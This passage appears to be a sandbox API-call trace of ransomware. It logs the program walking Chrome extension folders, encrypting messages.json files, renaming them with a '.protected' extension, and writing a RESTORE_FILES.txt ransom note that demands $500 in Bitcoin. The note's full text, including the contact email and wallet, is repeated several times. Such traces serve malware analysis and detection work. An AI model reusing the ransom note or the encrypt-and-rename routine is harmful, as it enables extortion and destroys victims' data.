Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.436] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.436] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.437] lstrlenA (lpString="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") returned 684 [0081.437] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.437] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.437] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.437] CloseHandle (hObject=0x164) returned 1 [0081.437] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned 141 [0081.438] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0081.438] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*") returned 143 [0081.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.438] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\.") returned 143 [0081.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.438] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\..") returned 144 [0081.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.438] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.438] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.439] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") 
returned 155 [0081.439] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.439] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.439] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.439] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.439] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0081.440] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0081.441] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.441] CloseHandle (hObject=0x168) returned 1 [0081.441] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected") returned 165 [0081.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0081.442] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.442] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0081.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.442] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.442] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.443] lstrlenA (lpString="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") returned 684 [0081.443] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.443] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.443] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.443] CloseHandle (hObject=0x164) returned 1 [0081.444] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned 141 [0081.444] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0081.444] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*") returned 143 [0081.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.444] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\.") returned 143 [0081.444] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.444] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\..") returned 144 [0081.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.445] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.445] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.445] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") 
returned 155 [0081.445] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.445] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.445] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.445] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.445] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0081.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.446] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0081.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.447] CloseHandle (hObject=0x168) returned 1 [0081.447] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected") returned 165 [0081.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0081.448] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.448] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0081.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.448] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.448] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.457] lstrlenA 